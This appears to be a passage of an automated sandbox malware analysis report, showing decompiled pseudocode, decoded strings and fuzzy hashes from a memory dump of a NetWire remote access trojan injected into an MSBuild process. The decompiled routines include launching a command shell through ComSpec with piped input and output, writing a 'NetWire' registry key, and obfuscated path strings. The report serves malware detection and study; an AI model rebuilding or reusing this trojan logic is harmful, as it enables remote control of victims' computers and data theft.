                        						_v596 = 0;
                        						_v600 = __edi;
                        						_v604 = __esi;
                        						_v588 = __eax;
                        						L0041F42C();
                        						__esp = __esp - 0x14;
                        						if(__eax != 0) {
                        							goto L28;
                        						}
                        						__eax = _v576;
                        						_v620 = __ebp;
                        						_v624 = __eax;
                        						L0041F444();
                        						__ebx = __eax;
                        						_push(__ecx);
                        						_push(__ecx);
                        						__eax = _v584;
                        						_v632 = __eax;
                        						L0041F45C();
                        						_push(__eax);
                        						if(__ebx != 0) {
                        							goto L28;
                        						}
                        						__ebx =  &_v576;
                        						_v612 = __ebp;
                        						_v616 = __edi;
                        						_v620 = __esi;
                        						__eax = E004127A8( &_v576, 0x204, "%c%.8x%s\\%s", 4);
                        						L14:
                        						if(_t126 != 0) {
                        							_v628 = _t126;
                        							E00405D7D(_t132, _v32, 0xe8, _t130);
                        						}
                        						L16:
                        						_t129 = 1;
                        						goto L29;
                        					case 4:
                        						goto L28;
                        					case 5:
                        						__eax =  &_v556;
                        						_v592 = 0x2001f;
                        						_v596 = 0;
                        						_v600 = __edi;
                        						_v604 = __esi;
                        						_v588 = __eax;
                        						L0041F42C();
                        						__esp = __esp - 0x14;
                        						if(__eax != 0) {
                        							goto L28;
                        						}
                        						__eax =  &_v572;
                        						_v608 = 0;
                        						_v616 = 0;
                        						_v620 = __ebp;
                        						__ebx = 0;
                        						_v604 =  &_v572;
                        						__eax =  &_v568;
                        						_v612 =  &_v568;
                        						__eax = _v576;
                        						_v624 = __eax;
                        						L0041F424();
                        						__esp = __esp - 0x18;
                        						if(__eax != 0) {
                        							L25:
                        							__eax = _v600;
                        							_v648 = __eax;
                        							L0041F45C();
                        							_push(__eax);
                        							if(__bl == 0) {
                        								goto L29;
                        							}
                        							__eax = _v24;
                        							_v636 = __esi;
                        							__esi =  &_v592;
                        							_v624 = __ebp;
                        							_v632 = __edi;
                        							_v640 = 6;
                        							_v644 = 0x42443c;
                        							_v628 = _v24;
                        							_v648 = 0x204;
                        							_v652 =  &_v592;
                        							__eax = E004127A8();
                        							if(__eax == 0) {
                        								goto L29;
                        							}
                        							L27:
                        							_v592 = __eax;
                        							_a4 = E00405D7D(__edx, _a4, 0xe8, __esi);
                        							goto L29;
                        						}
                        						__eax = _v596;
                        						_v648 = __eax;
                        						L0041F714();
                        						_v588 = __eax;
                        						if(__eax == 0) {
                        							goto L25;
                        						}
                        						_v632 = __eax;
                        						__eax =  &_v592;
                        						__edx =  &_v596;
                        						_v640 = 0;
                        						_v644 = __ebp;
                        						_v636 =  &_v592;
                        						__eax = _v600;
                        						_v628 = __edx;
                        						_v648 = __eax;
                        						L0041F424();
                        						__esp = __esp - 0x18;
                        						if(__eax == 0) {
                        							__eax = _v620;
                        							_v664 = 0;
                        							_v652 = _v620;
                        							__eax = _v612;
                        							_v656 = _v612;
                        							__eax = _v616;
                        							_v660 = _v616;
                        							__eax = _v44;
                        							_v668 = _v44;
                        							__eax = _v624;
                        							 *__esp = __eax;
                        							L0041F41C();
                        							__esp = __esp - 0x18;
                        							if(__eax != 0) {
                        								goto L21;
                        							}
                        							__eax = _v648;
                        							_v692 = __ebp;
                        							 *__esp = __eax;
                        							L0041F444();
                        							_push(__edx);
                        							_push(__edx);
                        							__ebx = 0 | __eax == 0x00000000;
                        							L24:
                        							 &_v636 = E00407F59( &_v636);
                        							goto L25;
                        						}
                        						L21:
                        						__ebx = 0;
                        						goto L24;
                        				}
                        			}


                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: %c%.8x%s$%c%.8x%s%s$%c%.8x%s\%s$?
                        • API String ID: 0-1127014073
                        • Opcode ID: f1ef6a393e88643d805cb06b121d17f0be80af9c4145ae47d983f0f57c2ce8e1
                        • Instruction ID: 5e49c9d9379b1dd87b15daa38270e0e0a3fc6f91244b4719e2a77dc22190009b
                        • Opcode Fuzzy Hash: f1ef6a393e88643d805cb06b121d17f0be80af9c4145ae47d983f0f57c2ce8e1
                        • Instruction Fuzzy Hash: DAB1CFB0909345AFD700EF69D18469FFBE4BF84744F40892EF99887311D7B8D5898B46
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 63%
                        			E004113B8(void* __eax, void* __ecx, char* __edx, void* __eflags, char** _a4) {
                        				char _v544;
                        				intOrPtr _v584;
                        				intOrPtr _v588;
                        				intOrPtr _v592;
                        				short _v600;
                        				intOrPtr _v604;
                        				char _v612;
                        				char _v628;
                        				char* _v632;
                        				char* _v636;
                        				char _v640;
                        				char _v656;
                        				char _v660;
                        				char _v668;
                        				intOrPtr _v672;
                        				char* _v688;
                        				intOrPtr _v692;
                        				char* _v720;
                        				intOrPtr _v724;
                        				char* _v728;
                        				char* _v732;
                        				char* _v736;
                        				char* _v740;
                        				char* _v744;
                        				char* _v748;
                        				char* _v752;
                        				char* _v756;
                        				char* _v760;
                        				char* _v764;
                        				char* _v768;
                        				char _v772;
                        				intOrPtr _v776;
                        				char* _v796;
                        				intOrPtr _v800;
                        				char* _v804;
                        				char* _v808;
                        				char* _v812;
                        				char* _v824;
                        				intOrPtr _v828;
                        				char* _v832;
                        				char* _v836;
                        				char* _v844;
                        				char* _v848;
                        				intOrPtr _v852;
                        				char* _v856;
                        				void* _t85;
                        				char* _t92;
                        				char* _t93;
                        				intOrPtr _t94;
                        				intOrPtr _t95;
                        				char* _t100;
                        				char* _t102;
                        				void* _t106;
                        				char* _t110;
                        				char** _t118;
                        				void* _t119;
                        				char* _t120;
                        				char* _t121;
                        				char* _t122;
                        				char* _t123;
                        				char* _t125;
                        				char* _t126;
                        				char* _t127;
                        				char** _t128;
                        				void* _t129;
                        				void* _t130;
                        				void* _t131;
                        				char** _t132;
                        
                        				_t120 = __edx;
                        				_t119 = __ecx;
                        				_t125 =  &_v544;
                        				_v732 = "ComSpec";
                        				_t118 = _a4;
                        				L0041F724();
                        				E004127A8(_t125, 0x204, "%s", __eax);
                        				_t85 = E00406F1A(_t120, _t125);
                        				if(_t85 == 0) {
                        					_v732 = "WINDIR";
                        					L0041F724();
                        					E004127A8(_t125, 0x204, E004081AA("%6\\6Z65dlNh\\YlS.dfd"), _t85);
                        				}
                        				if(E00406F1A(_t120, _t125) == 0) {
                        					L6:
                        					_v720 = 0;
                        					L7:
                        					return E00405D7D(_t120,  *_t118, 0xb9, 0);
                        				}
                        				_t122 =  &_v612;
                        				_t127 =  &_v628;
                        				_v724 = 0x44;
                        				_v728 = 0;
                        				_v636 = 0;
                        				_v732 = _t122;
                        				_v632 = 1;
                        				E004129E4();
                        				E004129E4(_t127, 0, 0x10);
                        				_t121 =  &_v640;
                        				_v720 = 0;
                        				_v728 =  &_v656;
                        				_t92 =  &_v660;
                        				_v724 = _t121;
                        				_v672 = _t121;
                        				_v732 = _t92;
                        				L0041F674();
                        				_t130 = _t129 - 0x10;
                        				_t120 = _v688;
                        				_v736 = 0;
                        				if(_t92 == 0) {
                        					goto L7;
                        				}
                        				_t93 =  &_v668;
                        				_v740 = _t120;
                        				_v744 = 0x42b5d4;
                        				_v748 = _t93;
                        				L0041F674();
                        				_t131 = _t130 - 0x10;
                        				if(_t93 == 0) {
                        					goto L6;
                        				}
                        				_v764 = _t122;
                        				L0041F59C();
                        				_push(_t93);
                        				_t94 = _v692;
                        				_v732 = _t127;
                        				_v736 = _t122;
                        				_v584 = _t94;
                        				_v588 = _t94;
                        				_t95 = _v688;
                        				_v740 = 0;
                        				_v744 = 0;
                        				_v748 = 0;
                        				_v752 = 1;
                        				_v756 = 0;
                        				_v760 = 0;
                        				_v764 = _t125;
                        				_v768 = 0;
                        				_v592 = _t95;
                        				_v604 = 0x101;
                        				_v600 = 0;
                        				L0041F66C();
                        				_t132 = _t131 - 0x28;
                        				if(_t95 == 0) {
                        					goto L6;
                        				}
                        				_v808 = _v732;
                        				L0041F694();
                        				_push(_t122);
                        				_t123 = 0;
                        				_v812 = _v732;
                        				L0041F694();
                        				_push(_t127);
                        				_v804 = 0xffffffff;
                        				_v808 = _t125;
                        				_t128 =  &_v728;
                        				_v812 = 0xb6;
                        				_v732 = 0;
                        				 *_t132 =  *_t118;
                        				E00405D7D(_t120);
                        				while(1) {
                        					_t100 = _v744;
                        					_v796 = 0;
                        					_v800 = _t128;
                        					_v804 = 0;
                        					_v808 = 0;
                        					_v812 = 0;
                        					 *_t132 = _t100;
                        					_v728 = 0;
                        					L0041F534();
                        					_t132 = _t132 - 0x18;
                        					if(_t100 == 0) {
                        						goto L17;
                        					}
                        					L10:
                        					_t126 = _v752;
                        					if(_t126 != 0 &&  *0x42b5d0 != 0) {
                        						if(_t123 >= _t126) {
                        							L15:
                        							_v824 = 0;
                        							_v828 = _t128;
                        							_v832 = _t126;
                        							_v836 = _v756;
                        							_t110 = _v768;
                        							 *_t132 = _t110;
                        							L0041F51C();
                        							_t132 = _t132 - 0x14;
                        							if(_t110 != 0) {
                        								_v856 = 0xb7;
                        								_v848 = _v772;
                        								_v852 = _v776;
                        								 *_t132 =  *_t118;
                        								if(E00405D7D(_t120) + 1 != 0) {
                        									while(1) {
                        										_t100 = _v744;
                        										_v796 = 0;
                        										_v800 = _t128;
                        										_v804 = 0;
                        										_v808 = 0;
                        										_v812 = 0;
                        										 *_t132 = _t100;
                        										_v728 = 0;
                        										L0041F534();
                        										_t132 = _t132 - 0x18;
                        										if(_t100 == 0) {
                        											goto L17;
                        										}
                        										goto L10;
                        									}
                        								}
                        								goto L17;
                        							}
                        						} else {
                        							 *_t132 = _t126;
                        							L0041F714();
                        							_v756 = _t100;
                        							if(_t100 != 0) {
                        								_t123 = _t126;
                        								goto L15;
                        							}
                        						}
                        					}
                        					L18:
                        					if( *0x42b5d0 != 0) {
                        						 *_t132 = 0x96;
                        						E00407EF4();
                        						continue;
                        					}
                        					_t102 = _v768;
                        					 *_t132 = _t102;
                        					L0041F694();
                        					_push(_t102);
                        					_v844 =  *0x42b5d4;
                        					L0041F694();
                        					_v844 = 0;
                        					_v848 = _v744;
                        					L0041F4E4();
                        					_v844 = 0;
                        					_v848 = 0;
                        					_v852 = 0xb8;
                        					_v856 =  *_t118;
                        					_t106 = E00405D7D(_t120, _t119, _t119, _t120);
                        					if(_v772 != 0) {
                        						return E00407F59( &_v772);
                        					}
                        					return _t106;
                        					L17:
                        					 *0x42b5d0 = 0;
                        					goto L18;
                        				}
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: %6\6Z65dlNh\YlS.dfd$ComSpec$D$WINDIR
                        • API String ID: 0-1530679608
                        • Opcode ID: b64c2fc2229afcc4d161395c65153967a16c51a25797fb042b57dc32eb4a4a99
                        • Instruction ID: c0a2dff8ecfd3ca449ec7184aa16f3f0f3f293b9e2d18e22baf8a99b3bb4e763
                        • Opcode Fuzzy Hash: b64c2fc2229afcc4d161395c65153967a16c51a25797fb042b57dc32eb4a4a99
                        • Instruction Fuzzy Hash: F4919EB05087419FD710AF65C18875FBBE4AF84748F01892EE5D88B3A1D7B99489CF8A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: MdYQ0Nh.Sii$m6CEd5mWnWRMd664WRaC5C$m6C_0ddrd5Q0RcQ88d0$m6CjRQld0C5dmWnWRMd664WR6
                        • API String ID: 0-3174184691
                        • Opcode ID: cfe50344d1b9a1cf591cc6770518526586da0e046c6cb975facc6d88c40fe8ab
                        • Instruction ID: 94c08b94b57df9e53fa0a2455e2e566f66701f19132ff7a1c430a127e0c0603f
                        • Opcode Fuzzy Hash: cfe50344d1b9a1cf591cc6770518526586da0e046c6cb975facc6d88c40fe8ab
                        • Instruction Fuzzy Hash: 9761DEB44087109FD710AF26C584A6BBBF4BF88704F01892EE8D897391E7799985CF56
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: %d:%I64u:%s%s;$%d:%s%s;$%s%s\$%s*
                        • API String ID: 0-525976846
                        • Opcode ID: 334888fa3b4434e061fa7b69daef3cafc177c312af5b0b50911e5eeb64500dc7
                        • Instruction ID: f6b2b9afb8f28ceff06ae1ca88c29ba9ed65548566ee5afaf2077295461a783a
                        • Opcode Fuzzy Hash: 334888fa3b4434e061fa7b69daef3cafc177c312af5b0b50911e5eeb64500dc7
                        • Instruction Fuzzy Hash: 0971AFB44093459BD320EF6AD18469FBBE0AF84758F008E1EE4D887391D7B89689CF57
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ../nettle-3.5.1/memxor3.c$M$n == 1$n > 0
                        • API String ID: 0-17687075
                        • Opcode ID: 389ade0749032fac037805b9abc3480a8171c3f13d13cda5c72ac285551c0497
                        • Instruction ID: 88b4d72e3a3b074a803e33dc480ae7ecbd49f2114936249b734713bf6416a905
                        • Opcode Fuzzy Hash: 389ade0749032fac037805b9abc3480a8171c3f13d13cda5c72ac285551c0497
                        • Instruction Fuzzy Hash: 0951BB716083A28FC300CF28E59052BBBF1BFCA310F048A1EE69087645D335EA19CF92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: %s\%s$lWk67i45dN.Sii$lWkQ54i6.Sii$lWkniQd.Sii
                        • API String ID: 0-1446494701
                        • Opcode ID: 11b24af2d9943bdd585289004bbed1b8b93da4e2fff93dd0614d11004ba5693e
                        • Instruction ID: 99cae675b6ce9c0e2fecfda939a24821795d6923156f602411de4cd21c6c0224
                        • Opcode Fuzzy Hash: 11b24af2d9943bdd585289004bbed1b8b93da4e2fff93dd0614d11004ba5693e
                        • Instruction Fuzzy Hash: D1414BB05083459AC710EF25D58426EBBE0EF91348F41982FE4D8AB382D77D9655CB4F
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $ $@$Password
                        • API String ID: 0-2841454644
                        • Opcode ID: 246fdc29b333a0ea924cba9d3f13c81f6e5188126dcc5c7f772fd54f0c83ee0b
                        • Instruction ID: 5ee87fdfff2276ed8f5c7cc8756256179826899119173577a518fef8d5e42c6b
                        • Opcode Fuzzy Hash: 246fdc29b333a0ea924cba9d3f13c81f6e5188126dcc5c7f772fd54f0c83ee0b
                        • Instruction Fuzzy Hash: 2421EFB0509314AED310AF52D58879BBBE4BF85348F408C2EE4C857281D7B985899BAB
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 18%
                        			E004089ED(void* __ecx, void* __edx, void* __eflags) {
                        				char _v528;
                        				char* _v548;
                        				char* _v552;
                        				void* _t9;
                        				void* _t10;
                        				char* _t15;
                        				char* _t16;
                        				char* _t18;
                        				void* _t20;
                        				void* _t21;
                        				char** _t22;
                        
                        				_t21 = __edx;
                        				_t20 = __ecx;
                        				 *_t22 = 8;
                        				_t9 = E004082E8(__eflags);
                        				_t24 = _t9;
                        				if(_t9 != 0) {
                        					 *_t22 = "MT_qUDrj\\F4Y0W6W85\\U4RSWg6\\PQ00dR5zd064WR\\rQR\\";
                        					_t18 = E004081AA();
                        					_v548 = 0x4224c8;
                        					_v552 = _t18;
                        					 *_t22 = 0x80000001;
                        					E00410803(_t20, _t21);
                        				}
                        				 *_t22 = 0x10;
                        				_t10 = E004082E8(_t24);
                        				_t25 = _t10;
                        				if(_t10 != 0) {
                        					 *_t22 = "MT_qUDrj\\F4Y0W6W85\\DY542d Md5Qs\\XR65CiidS PWlsWRdR56";
                        					_t16 = E004081AA();
                        					_v548 = 0x4224a0;
                        					_v552 = _t16;
                        					 *_t22 = 0x80000002;
                        					E0041086B(_t20);
                        				}
                        				 *_t22 = 4;
                        				if(E004082E8(_t25) != 0) {
                        					_t15 =  *0x42b460;
                        					if(_t15 != 0) {
                        						 *_t22 = _t15;
                        						L0041F78C();
                        					}
                        				}
                        				_v548 = "NetWire";
                        				_v552 = "SOFTWARE\\";
                        				 *_t22 = 0x80000001;
                        				E0041086B(_t20);
                        				_v552 = 0x204;
                        				 *_t22 =  &_v528;
                        				return E00407C77( &_v528);
                        			}

                        Strings
                        • MT_qUDrj\F4Y0W6W85\DY542d Md5Qs\XR65CiidS PWlsWRdR56, xrefs: 00408A37
                        • SOFTWARE\, xrefs: 00408A84
                        • NetWire, xrefs: 00408A7C
                        • MT_qUDrj\F4Y0W6W85\U4RSWg6\PQ00dR5zd064WR\rQR\, xrefs: 00408A03
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: MT_qUDrj\F4Y0W6W85\DY542d Md5Qs\XR65CiidS PWlsWRdR56$MT_qUDrj\F4Y0W6W85\U4RSWg6\PQ00dR5zd064WR\rQR\$NetWire$SOFTWARE\
                        • API String ID: 0-126448098
                        • Opcode ID: e80744430c769008ed9aa6cab13524ccc618e940c92f136a1cd14b05883cfc76
                        • Instruction ID: bb4ce6ad198e61c342c208a9868e2ee3a63cf1cfb8a338f91740164746fe8c6d
                        • Opcode Fuzzy Hash: e80744430c769008ed9aa6cab13524ccc618e940c92f136a1cd14b05883cfc76
                        • Instruction Fuzzy Hash: 1101B7B06087119AD700BF65D64526DBBE0AF40348F81C82FE4C86B286DBBD8485DB5F
                        Uniqueness

                        Uniqueness Score: -1.00%